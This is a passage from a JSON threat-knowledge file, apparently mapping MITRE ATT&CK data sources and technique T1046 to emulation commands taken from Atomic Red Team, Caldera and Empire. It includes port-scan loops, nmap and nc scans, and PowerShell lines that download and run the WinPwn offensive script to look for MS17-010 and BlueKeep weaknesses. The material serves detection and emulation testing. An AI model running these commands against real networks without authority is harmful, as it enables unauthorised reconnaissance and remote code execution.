This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1046", + "command_list": [ + "for port in {1..65535};\ndo\n echo >/dev/tcp/192.168.1.1/$port && echo \"port $port is open\" || echo \"port $port is closed\" : ;\ndone\n", + "nmap -sS #{network_range} -p #{port}\ntelnet 192.168.1.1 #{port}\nnc -nv 192.168.1.1 #{port}\n", + "nmap -sS #{network_range} -p 80\ntelnet #{host} 80\nnc -nv #{host} 80\n", + "nmap -sS 192.168.1.0/24 -p #{port}\ntelnet #{host} #{port}\nnc -nv #{host} #{port}\n", + "nmap 
#{host_to_scan}", + "nmap 127.0.0.1", + "python #(unknown) -i 127.0.0.1\n", + "python PathToAtomicsFolder\\T1046\\src\\T1046.py -i #{host_ip}\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nspoolvulnscan -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMS17-10 -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbluekeep -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nfruit -noninteractive -consoleoutput", + "nmap -sV -p #{remote.host.port} #{remote.host.ip}\n", + "python3 scanner.py -i #{remote.host.ip}\n", + "Import-Module ./basic_scanner.ps1;\n$ports = @(22, 53, 80, 445);\nGet-NetIPConfiguration | ?{$_.NetAdapter.Status -ne \"Disconnected\"} | Get-NetIPaddress -AddressFamily IPv4 | %{\n $ipv4 = $_.IPAddress;\n $prefixLength = $_.PrefixLength;\n Scan-Netrange -ipv4 $ipv4 -prefixLength $prefixLength -ports $ports;\n};\n", + "rcpping.exe -s 127.0.0.1 -t ncacn_np", + "rcpping.exe -s 127.0.0.1 -e 1234 -a privacy -u NTLM", + "powershell/recon/find_fruit", + "powershell/situational_awareness/network/get_sql_instance_domain", + "powershell/situational_awareness/network/get_sql_server_info", + "powershell/situational_awareness/network/portscan", + 
"python/situational_awareness/network/find_fruit", + "python/situational_awareness/network/port_scan" + ], + "commands": [ + { + "command": "for port in {1..65535};\ndo\n echo >/dev/tcp/192.168.1.1/$port && echo \"port $port is open\" || echo \"port $port is closed\" : ;\ndone\n", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "nmap -sS #{network_range} -p #{port}\ntelnet 192.168.1.1 #{port}\nnc -nv 192.168.1.1 #{port}\n", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "nmap -sS #{network_range} -p 80\ntelnet #{host} 80\nnc -nv #{host} 80\n", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "nmap -sS 192.168.1.0/24 -p #{port}\ntelnet #{host} #{port}\nnc -nv #{host} #{port}\n", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "nmap #{host_to_scan}", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "nmap 127.0.0.1", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "python #(unknown) -i 127.0.0.1\n", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "python PathToAtomicsFolder\\T1046\\src\\T1046.py -i #{host_ip}\n", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nspoolvulnscan -noninteractive -consoleoutput", + "source": "atomics/T1046/T1046.yaml", + "name": 
"Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMS17-10 -noninteractive -consoleoutput", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbluekeep -noninteractive -consoleoutput", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nfruit -noninteractive -consoleoutput", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "nmap -sV -p #{remote.host.port} #{remote.host.ip}\n", + "source": "data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml", + "name": "Uses nmap to fingerprint services that were network accessible" + }, + { + "command": "python3 scanner.py -i #{remote.host.ip}\n", + "source": "data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml", + "name": "Use dropped scanner to find open popular ports" + }, + { + "command": "Import-Module ./basic_scanner.ps1;\n$ports = @(22, 53, 80, 445);\nGet-NetIPConfiguration | ?{$_.NetAdapter.Status -ne \"Disconnected\"} | Get-NetIPaddress -AddressFamily IPv4 | %{\n $ipv4 = $_.IPAddress;\n $prefixLength = $_.PrefixLength;\n Scan-Netrange -ipv4 $ipv4 -prefixLength $prefixLength -ports 
$ports;\n};\n", + "source": "data/abilities/discovery/5a4cb2be-2684-4801-9355-3a90c91e0004.yml", + "name": "Scans the local network for common open ports" + }, + { + "command": "rcpping.exe -s 127.0.0.1 -t ncacn_np", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "rcpping.exe -s 127.0.0.1 -e 1234 -a privacy -u NTLM", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell/recon/find_fruit", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/get_sql_instance_domain", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/get_sql_server_info", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/portscan", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/find_fruit", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/port_scan", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1046", + "display_name": "Network Service Scanning", + "atomic_tests": [ + { + "name": "Port Scan", + "auto_generated_guid": "68e907da-2539-48f6-9fc9-257a78c05540", + "description": "Scan ports to check for listening ports.\n\nUpon successful execution, sh will perform a network connection against a 
single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "for port in {1..65535};\ndo\n echo >/dev/tcp/192.168.1.1/$port && echo \"port $port is open\" || echo \"port $port is closed\" : ;\ndone\n", + "name": "sh" + } + }, + { + "name": "Port Scan Nmap", + "auto_generated_guid": "515942b0-a09f-4163-a7bb-22fefb6f185f", + "description": "Scan ports to check for listening ports with Nmap.\n\nUpon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "host": { + "description": "Host to scan.", + "type": "String", + "default": "192.168.1.1" + }, + "port": { + "description": "Ports to scan.", + "type": "String", + "default": "80" + }, + "network_range": { + "description": "Network Range to Scan.", + "type": "String", + "default": "192.168.1.0/24" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if nmap command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v nmap)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n" + }, + { + "description": "Check if nc command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v nc)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)\n" + }, + { + "description": "Check if telnet command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v telnet)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install 
epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)\n" + } + ], + "executor": { + "command": "nmap -sS #{network_range} -p #{port}\ntelnet #{host} #{port}\nnc -nv #{host} #{port}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Port Scan NMap for Windows", + "auto_generated_guid": "d696a3cb-d7a8-4976-8eb5-5af4abf2e3df", + "description": "Scan ports to check for listening ports for the local host 127.0.0.1", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "nmap_url": { + "description": "NMap installer download URL", + "type": "Url", + "default": "https://nmap.org/dist/nmap-7.80-setup.exe" + }, + "host_to_scan": { + "description": "The host to scan with NMap", + "type": "String", + "default": "127.0.0.1" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "NMap must be installed\n", + "prereq_command": "if (cmd /c \"nmap 2>nul\") {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest -OutFile $env:temp\\nmap-7.80-setup.exe #{nmap_url}\nStart-Process $env:temp\\nmap-7.80-setup.exe /S\n" + } + ], + "executor": { + "command": "nmap #{host_to_scan}", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Port Scan using python", + "auto_generated_guid": "6ca45b04-9f15-4424-b9d3-84a217285a5c", + "description": "Scan ports to check for listening ports with python\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "host_ip": { + "description": "Host to scan.", + "type": "String", + "default": "127.0.0.1" + }, + "filename": { + "description": "Location of the project file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1046\\src\\T1046.py" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Check if python exists on the machine\n", + "prereq_command": "if (python --version) {exit 0} else {exit 1}\n", + "get_prereq_command": "echo \"Python 
3 must be installed manually\"\n" + } + ], + "executor": { + "command": "python #(unknown) -i #{host_ip}\n", + "name": "powershell" + } + }, + { + "name": "WinPwn - spoolvulnscan", + "auto_generated_guid": "54574908-f1de-4356-9021-8053dd57439a", + "description": "Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nspoolvulnscan -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - MS17-10", + "auto_generated_guid": "97585b04-5be2-40e9-8c31-82157b8af2d6", + "description": "Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMS17-10 -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - bluekeep", + "auto_generated_guid": "1cca5640-32a9-46e6-b8e0-fabbe2384a73", + "description": "Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. 
Can take many minutes to complete (~600 seconds in testing on a small domain).", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbluekeep -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - fruit", + "auto_generated_guid": "bb037826-cbe8-4a41-93ea-b94059d6bb98", + "description": "Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nfruit -noninteractive -consoleoutput", + "name": "powershell" + } + } + ] + }, + { + "id": "3a2ce3d5-e9e2-4344-ae23-470432ff8687", + "name": "Fingerprint network services", + "description": "Uses nmap to fingerprint services that were network accessible", + "tactic": "discovery", + "technique": { + "attack_id": "T1046", + "name": "Network Service Scanning" + }, + "platforms": { + "darwin": { + "sh": { + "command": "nmap -sV -p #{remote.host.port} #{remote.host.ip}\n" + } + }, + "linux": { + "sh": { + "command": "nmap -sV -p #{remote.host.port} #{remote.host.ip}\n" + } + } + } + }, + { + "id": "47abe1f5-55a5-46cc-8cad-506dac8ea6d9", + "name": "Scan IP for ports", + "description": "Use dropped scanner to find open popular ports", + "tactic": "discovery", + "technique": { + "attack_id": "T1046", + "name": "Network Service Scanning" + }, + 